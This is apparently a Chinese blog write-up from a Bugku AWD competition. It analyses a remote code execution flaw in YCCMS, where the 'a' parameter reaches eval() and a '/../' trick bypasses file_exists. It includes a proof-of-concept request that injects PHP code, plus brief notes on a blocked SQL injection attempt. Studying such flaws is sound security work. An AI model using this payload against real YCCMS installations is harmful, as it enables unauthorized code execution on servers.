bugku YCCMS漏洞

今天打bugku的在线awd

打的时候看到了

php 复制代码
	public function run() {
		$_m = isset($_GET['m']) ? $_GET['m'] : 'index';
		method_exists($this, $_m) ? eval('$this->'.$_m.'();') : $this->index();
	}

算个路由函数,通过m参数来指定model

当时就觉得eval这里有问题,但是看到前面的ethod_exists就感觉有力打不出,因为当时是内部赛,被别的事干扰了以至于去审计其他漏洞去了

事后我想着搜索一下这个yccms的漏洞没想到这里真的可以绕过

参考文章 https://blog.csdn.net/cosmoslin/article/details/123178882

POC

sh 复制代码
?a=Factory;phpinfo();//../

分析

从admin开始观察

php 复制代码
<?php
require str_replace('\\','/',substr(dirname(__FILE__),0,-6)).'/config/run.inc.php';
?>

跟进

可以发现代码很简单

如果类为Action结尾,就是controller目录下寻找

如果Model结尾,就在model目录下寻找

否则在public/class目录下寻找

跟进单入口

array数组中就是要登录才能访问的文件

这些文件都在controller目录下,以查询字符串a来传递控制器的类名

php 复制代码
if (!file_exists(ROOT_PATH.'/controller/'.ucfirst($_a).'Action.class.php')) $_a = 'Login';
eval('self::$_obj = new '.ucfirst($_a).'Action();');

漏洞点就在上面这个eval中,我们先看完整个流程
$_a 从getA 方法中来

而controller中,所有类都继承自 Action这个类

还记得单入口吗

这里实际就是返回后的控制器再执行了父类的run方法

首先判断本类是否有这个方法(method_exists),在eval执行本方法

总结一下

a指定控制器(类)

m指定类中的方法

任意代码执行

回过头分析漏洞点

php 复制代码
if (!file_exists(ROOT_PATH.'/controller/'.ucfirst($_a).'Action.class.php')) $_a = 'Login';
eval('self::$_obj = new '.ucfirst($_a).'Action();');

首先判断类是否存在,然后再new该类 我们可以通过 /../ 来绕过 file_exists 函数

这里举个栗子

php 复制代码
file_exists('index.php');	# true

上面判断是否有index.php

php 复制代码
file_exists('cvdavevfvdfavdacdsvd/../index.php');	# true

当我们伪造一个不存在的目录时,再使用 /.../,此函数则不会判断上一个目录是否存在

通过这个特性,我们只需要根据类的加载机制闭合前面的new语句即可执行

php 复制代码
eval('self::$_obj = new '.ucfirst($_a).'Action();');

还记得源码类的加载机制吗

如果类为Action结尾,就是controller目录下寻找

如果Model结尾,就在model目录下寻找

否则在public/class目录下寻找

所以我们再public/class目录下随便找个类即可,这里使用Factory测试

sh 复制代码
a=Factory;phpinfo();//../

sql注入

注入的话似乎很难

全局搜索addslashes函数

发现在Tool类中的setFormString函数

这是登录控制器的初始化类,主要负责登录的是AdminModel类

进入这个类,发现只要设置用户名或者密码就会进行引号的转义

我对这个转义现在还没有想到很好的办法,不知道有没有高手指点一下这个怎么过

相关推荐
сокол2 小时前
【网安-等保评测-基础记录】网络安全等级保护2.0 详解(定级、备案、测评、整改一站式指南)
网络·笔记·网络安全·云计算
pencek2 小时前
HakcMyVM-Liceo
网络安全
探索宇宙真理.3 小时前
Nginx UI MCP接口绕过认证漏洞 | CVE-2026-33032复现&研究
运维·经验分享·网络安全·nginx-ui
Chengbei116 小时前
某211高校从一个文档到十八万条sfz泄露和命令执行
人工智能·安全·web安全·网络安全·系统安全·状态模式·安全架构
学网安的肆伍7 小时前
个人实验:常见端口风险详解 + NMAP 内网实战扫描教程
安全·网络安全·资产扫描
深邃-9 小时前
【Web安全】-基础环境安装:虚拟机安装,JDK环境安装(1)
java·开发语言·计算机网络·安全·web安全·网络安全·安全架构
bluechips·zhao20 小时前
帝国CMS 8.0 安全审计分析——代码审计
安全·网络安全·代码审计
W.A委员会21 小时前
常见网络攻击
网络·http·网络安全
大方子1 天前
【好靶场】ETag权限混淆漏洞
网络安全·好靶场
星依网络1 天前
紧急预警!Redis未授权访问漏洞利用与防护实战指南
网络安全